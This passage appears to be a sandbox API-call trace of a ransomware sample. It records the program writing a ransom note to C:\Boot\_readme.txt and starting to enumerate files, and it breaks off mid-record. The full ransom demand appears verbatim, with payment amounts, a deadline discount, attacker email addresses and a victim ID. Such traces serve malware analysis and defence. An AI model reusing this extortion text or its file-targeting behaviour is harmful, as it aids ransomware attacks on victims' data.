RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3290eb8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.642] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.642] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.642] PathFindFileNameW (pszPath="") returned="" [0142.643] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.643] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.643] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3290eb8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.643] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.643] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0142.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.643] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0142.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.644] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.644] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.644] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3290eb8 [0142.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x3221ae8 [0142.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x3221ae8, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x325d510 [0142.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0142.645] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.645] WriteFile (in: hFile=0x6f0, lpBuffer=0x325d510*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x325d510*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.646] CloseHandle (hObject=0x6f0) returned 1 [0142.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.646] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0142.646] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0142.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x9ac1a78 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.647] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x3275b70 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21f8 | out: hHeap=0x620000) returned 1 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a78 | out: hHeap=0x620000) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a78 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1910 | out: hHeap=0x620000) returned 1 [0142.647] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x9ac3460 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1410 [0142.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1ca8 | out: hHeap=0x620000) returned 1 [0142.647] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3280a80 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1ca8 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac2040 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.647] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x3203a90 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1410 [0142.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21f8 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d70 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1b18 [0142.648] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1910 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1d20 [0142.648] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, 